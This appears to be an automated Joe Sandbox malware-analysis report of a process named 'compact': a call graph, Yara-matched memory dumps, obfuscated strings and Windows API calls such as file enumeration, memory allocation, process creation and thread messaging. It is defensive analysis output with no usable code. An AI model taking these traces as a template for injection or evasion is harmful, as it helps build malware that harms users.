2e219d8 95737->95739 95743 2e21a6b 95739->95743 95759 2e269f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95739->95759 95740 2e24770 LdrLoadDll 95741 2e21c25 95740->95741 95755 2e37080 95741->95755 95743->95740 95745 2e27bfc 95744->95745 95746 2e27ac0 2 API calls 95745->95746 95747 2e27c1f 95746->95747 95748 2e27c41 95747->95748 95749 2e27c29 95747->95749 95751 2e27c5d 95748->95751 95753 2e382e0 NtClose 95748->95753 95750 2e27c34 95749->95750 95752 2e382e0 NtClose 95749->95752 95750->95732 95751->95732 95752->95750 95754 2e27c53 95753->95754 95754->95732 95756 2e370da 95755->95756 95758 2e370e7 95756->95758 95760 2e21c80 95756->95760 95758->95731 95759->95743 95776 2e27ea0 95760->95776 95762 2e21ca0 95763 2e22175 95762->95763 95780 2e30b00 95762->95780 95763->95758 95766 2e21ea1 95767 2e3b3c0 2 API calls 95766->95767 95770 2e21eb6 95767->95770 95768 2e21cfe 95768->95763 95783 2e3b290 95768->95783 95769 2e27e40 LdrInitializeThunk 95772 2e21ee1 95769->95772 95770->95772 95788 2e20920 95770->95788 95772->95763 95772->95769 95773 2e20920 LdrInitializeThunk 95772->95773 95773->95772 95774 2e27e40 LdrInitializeThunk 95775 2e2200f 95774->95775 95775->95772 95775->95774 95777 2e27ead 95776->95777 95778 2e27ed5 95777->95778 95779 2e27ece SetErrorMode 95777->95779 95778->95762 95779->95778 95781 2e3a120 NtAllocateVirtualMemory 95780->95781 95782 2e30b21 95781->95782 95782->95768 95784 2e3b2a0 95783->95784 95785 2e3b2a6 95783->95785 95784->95766 95786 2e3a290 RtlAllocateHeap 95785->95786 95787 2e3b2cc 95786->95787 95787->95766 95789 2e2093d 95788->95789 95792 2e38540 95789->95792 95793 2e3855a 95792->95793 95796 3602c70 LdrInitializeThunk 95793->95796 95794 2e20942 95794->95775 95796->95794 95797 2e27110 95798 2e27129 95797->95798 95806 2e2717c 95797->95806 95800 2e382e0 NtClose 95798->95800 95798->95806 95799 2e272a5 95801 2e27144 95800->95801 95807 2e26520 NtClose LdrInitializeThunk LdrInitializeThunk 95801->95807 95803 2e2727f 95803->95799 95809 
2e266f0 NtClose LdrInitializeThunk LdrInitializeThunk 95803->95809 95806->95799 95808 2e26520 NtClose LdrInitializeThunk LdrInitializeThunk 95806->95808 95807->95806 95808->95803 95809->95799 95810 2e38250 95811 2e382b9 95810->95811 95813 2e38271 95810->95813 95812 2e382cc NtDeleteFile 95811->95812 95819 2e38010 95820 2e380b6 95819->95820 95821 2e38032 95819->95821 95822 2e380c9 NtCreateFile 95820->95822 95823 2e37950 95824 2e3796d 95823->95824 95827 3602df0 LdrInitializeThunk 95824->95827 95825 2e37992 95827->95825 95833 2e22a17 95834 2e22a38 95833->95834 95835 2e26290 2 API calls 95834->95835 95836 2e22a43 95835->95836 95837 2e27358 95838 2e27349 95837->95838 95841 2e2735b 95837->95841 95839 2e2aee0 9 API calls 95838->95839 95840 2e2734f 95839->95840 95842 2e2851e 95843 2e28523 95842->95843 95844 2e284e2 95843->95844 95846 2e26f60 LdrInitializeThunk LdrInitializeThunk 95843->95846 95846->95844

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$JN\$K.$N$O$Q$Q$Qz$R$V~E&$X$Y$Z$\$b$d$f$j$m`$u$uC$uP$y9$0$^$l$}y9
                                                        • API String ID: 0-1953769178
                                                        • Opcode ID: 4ebefbb8747a988fb84de7d0dcee1f122221d888a120628e592b8ed0e73bf363
                                                        • Instruction ID: 1c343988351eb6e53eb5ebfc40b99ecb421ab873ac68aa8f42f6da3c010bd54d
                                                        • Opcode Fuzzy Hash: 4ebefbb8747a988fb84de7d0dcee1f122221d888a120628e592b8ed0e73bf363
                                                        • Instruction Fuzzy Hash: BB62C2B0D4522ACBEB28CF44C994BEDBBB2BB45308F1091E9C51D6B381D7B95A85CF44
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E2C254
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02E2C28F
                                                        • FindClose.KERNELBASE(?), ref: 02E2C29A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                        • Instruction ID: 5f77e8992caeb80fd6036156f29e6183251255797f249b45af47c73a91dae457
                                                        • Opcode Fuzzy Hash: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                        • Instruction Fuzzy Hash: FC3187729402187BDB21DBA0CC45FEF777DEF44B09F249559B90DA7180EB70AA848BA0
                                                        APIs
                                                        • NtCreateFile.NTDLL(?,?,?,?,00000036,?,?,?,?,?,?), ref: 02E380FA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                        • Instruction ID: e56b24b50e1e98dec5391d5ce7a05c5d686916caee55c12e8bffbd63d18c3878
                                                        • Opcode Fuzzy Hash: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                        • Instruction Fuzzy Hash: 8F31D2B5A00208AFDB14DF99D881EDEB7B9EF8C704F108219F919A7340D770A851CFA4
                                                        APIs
                                                        • NtReadFile.NTDLL(?,?,?,?,00000036,?,?,?,?), ref: 02E38242
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                        • Instruction ID: b1f6d5ab3c7609415755b2c6e49d4a0819e84b00bff73b234f87b0dda3f39cae
                                                        • Opcode Fuzzy Hash: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                        • Instruction Fuzzy Hash: E031C8B5A40608AFDB14DF99D881EEEB7B9EF88714F108219F919A7240D770A911CFA1
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(02E21CFE,?,02E370E7,00000000,00000004,00003000,?,?,?,?,?,02E370E7,02E21CFE,02E370E7,50FFFD9F,02E21CFE), ref: 02E384E4
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                        • Instruction ID: f3f2ff1ef44e2e61955152b43d2b6f75352eaca5a1e3d646d61639b28d51f2c1
                                                        • Opcode Fuzzy Hash: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                        • Instruction Fuzzy Hash: 772107B5A40208AFDB24DF99DC41EEFB7B9EF88700F008119F919A7280D774A811CBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                        • Instruction ID: 9e47b26466dae980f7ebd666466775c4d9d36f391385d5434b4eb286342c97cb
                                                        • Opcode Fuzzy Hash: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                        • Instruction Fuzzy Hash: 6001ADB1A41204BBE620EAA4DC05FEB77ADEB84710F008119FA09AB280D7B47900CBE5
                                                        APIs
                                                        • NtClose.NTDLL(?,02E233AC,001F0001,?,00000000,?,?,00000104), ref: 02E38311
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction ID: 6e80a10f318429b107a6f38a7e966304d9710cb4b0e029b44dc6d54a87056ec9
                                                        • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction Fuzzy Hash: E8E046362402147BC620BA5ADC42FDB776DDBC5724F408015FA09AB241C771B9188AE0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f80bbb1f456e02d688cb13769b14cd8e0c476a3c7330c29c948fc58b85fd995
                                                        • Instruction ID: 1442b43e1168d8bd35d05a73656ca0f11edbbdf41444c2068b19d55d85cadee4
                                                        • Opcode Fuzzy Hash: 8f80bbb1f456e02d688cb13769b14cd8e0c476a3c7330c29c948fc58b85fd995
                                                        • Instruction Fuzzy Hash: 4C900231645804139140B5584884546500597E1301B59C011E0424654D8B548A665361
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c13824a892047ede5b8296d754e4c99f581f26aaee2efe818d8b3d458be03313
                                                        • Instruction ID: 8c072896ad8e951ec5901f8929fdb39c0d42bcda4e9e22f4452cb65c805b81b8
                                                        • Opcode Fuzzy Hash: c13824a892047ede5b8296d754e4c99f581f26aaee2efe818d8b3d458be03313
                                                        • Instruction Fuzzy Hash: A1900261641504434140B5584804406700597E2301399C115A0554660D875889659269
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 055ab088e431d28e3542a639332d7435569a756726e9b7873cdf60f1c00aab97
                                                        • Instruction ID: 0e1f4fbc98658469cd97c856bc917377e58940e8613cce021582c27d04b8c2a8
                                                        • Opcode Fuzzy Hash: 055ab088e431d28e3542a639332d7435569a756726e9b7873cdf60f1c00aab97
                                                        • Instruction Fuzzy Hash: 79900261242404034105B5584414616500A87E1201B59C021E1014690EC76589A16125
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8d9a9ce86da5210ddc7c3bf92b8c1f0cfc7c418f8fde50be50ca90b3b7470ac4
                                                        • Instruction ID: 8c2f84e73e223ed05f08465261c532d0f843fda30b142c0fe04d7cbd7a7dda19
                                                        • Opcode Fuzzy Hash: 8d9a9ce86da5210ddc7c3bf92b8c1f0cfc7c418f8fde50be50ca90b3b7470ac4
                                                        • Instruction Fuzzy Hash: 4A90023124544C43D140B5584404A46101587D1305F59C011A0064794E97658E65B661
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 54ec5c8aae24fe4b52c77d404085176d94152ba8e24fa82aa2d3659e963b2e5a
                                                        • Instruction ID: fd3a474d9c95119cd7ddcb356fcdc89e1379132b334d315d6f5cedd67bdd1f47
                                                        • Opcode Fuzzy Hash: 54ec5c8aae24fe4b52c77d404085176d94152ba8e24fa82aa2d3659e963b2e5a
                                                        • Instruction Fuzzy Hash: 7990023124140C03D180B558440464A100587D2301F99C015A0025754ECB558B6977A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E196D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$J$K.$N$O$Q$Q$Qz$R$V~$X$Y$Z$\$b$d$f$j$m`$u$uC$y9$0$^$l$}
                                                        • API String ID: 2422867632-1566399811
                                                        • Opcode ID: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                        • Instruction ID: a09847c07f555689e330989b0414c8aeba3f6b0dee9a3c161b0a31bd0b249384
                                                        • Opcode Fuzzy Hash: b44b7bc89731ce96443ab5f8618f6722dc515995a559009f0b43fe51199da31e
                                                        • Instruction Fuzzy Hash: 8CC166B0945369DBEB618F41C958BDEBAB1BB05308F1081D9D15C3B281CBFA1A89CF95

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                        • Instruction ID: 6b455ca69ceebfb7b805c512f7b8886f0838b9c6efd2785ea6d7a0a986432a22
                                                        • Opcode Fuzzy Hash: add80484a598dd52526d25cfb2fed4bfe38904d1accfc7ff773322919351b675
                                                        • Instruction Fuzzy Hash: B001C431D8021876EB21A7908C02FDF7B7C9F41B50F04C055BA047B2C0D6B86606CBE5

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                        • Instruction ID: 6b455ca69ceebfb7b805c512f7b8886f0838b9c6efd2785ea6d7a0a986432a22
                                                        • Opcode Fuzzy Hash: 859bbb75967b6eb1d95fc84c509627164c9037ab0481433feb5e05c666f5a0a7
                                                        • Instruction Fuzzy Hash: B001C431D8021876EB21A7908C02FDF7B7C9F41B50F04C055BA047B2C0D6B86606CBE5

                                                        Control-flow Graph

                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                        • Instruction ID: ee318f3b527dba5454044ee3122ddde277d017a8e66397859bb9e604047181fc
                                                        • Opcode Fuzzy Hash: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                        • Instruction Fuzzy Hash: 0101FE32A8226876DB1157959C02FFFBB78DF41B14F108197FA04AF280D67466158BD5
                                                        APIs
                                                        • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02E20E1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: N77o9w1836$N77o9w1836
                                                        • API String ID: 1836367815-4204696664
                                                        • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction ID: a57e1bac0295a6f106c60703c043a60bd66752748e39ed8a931586f478dc242c
                                                        • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                        • Instruction Fuzzy Hash: FCF02476E8126876EB225B908C02FAF7B688F41B60F14C095FA007F2C1E6B4A5028BD5
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 02E32F6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                        • Instruction ID: e7b8c927618ab11d9279274d2020dc19f7e1efb46a8a833bbe224ddf784649bf
                                                        • Opcode Fuzzy Hash: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                        • Instruction Fuzzy Hash: B3319EB1641305BBD718DF64C884FE7BBA8AB48705F00862DBA59AB240D770BA40CBA0
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 02E2EF47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                        • Instruction ID: 42761a14171b8f63c1899df4d638be25137fb4b6a8410dd691f296699a2f2a3a
                                                        • Opcode Fuzzy Hash: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                        • Instruction Fuzzy Hash: BD3152B5A002099FDB00DFD8D880DEFB7B9BF48304B148559E916AB354D771AE45CBA0
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 02E2EF47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                        • Instruction ID: 47f8f339a51587a0bccdf735a770eaa957829f7a4d90338a7344e4c713fe5d74
                                                        • Opcode Fuzzy Hash: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                        • Instruction Fuzzy Hash: DF3121B5A006099FDB00DFD8D880DEFB7B9BF88304B148559E906A7314D775EE45CBA0
                                                        APIs
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02E2C28F
                                                        • FindClose.KERNELBASE(?), ref: 02E2C29A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFileNext
                                                        • String ID:
                                                        • API String ID: 2066263336-0
                                                        • Opcode ID: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                        • Instruction ID: 26237387c7411fe7e0b70d4ea170a4df6b07bdd95a6fb223131e38cffbef142f
                                                        • Opcode Fuzzy Hash: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                        • Instruction Fuzzy Hash: 21D0C93678402D9A4B0089E5EC44AED7764FA94A66B2091AAE80AD6040EB31C50556D0
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E247E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction ID: 0aa80e5a6326fdb811d7dda2e01fdaae502d5cf2201c15a4e7c3d3d6a9706206
                                                        • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction Fuzzy Hash: 48011EB9E4020DBBDB10DAE4DC45F9DB3B99B44309F0081A5E91A97281F671E758CB91
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E28053,00000010,?,?,?,00000044,?,00000010,02E28053,?,?,?), ref: 02E38713
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction ID: e3c8af47994debcd909968ad19171662b3280ac471342d4cef67186839ded612
                                                        • Opcode Fuzzy Hash: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                        • Instruction Fuzzy Hash: 5901C4B2205108BBCB44DE99DC81EEB77ADAF8C754F508108BA09D7240D630F851CBA4
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E196D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                        • Instruction ID: d8dcc7acd0d656871d4eb3283898756341fbe49be70f281ca6591f4ed653d790
                                                        • Opcode Fuzzy Hash: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                        • Instruction Fuzzy Hash: EDF06D333842043AE32076AA9C02FD7B38CDB80BB5F14402AF70DEB2C0D996B44187E8
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,02E24043,000000F4,?,?,?,?,?), ref: 02E3865C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
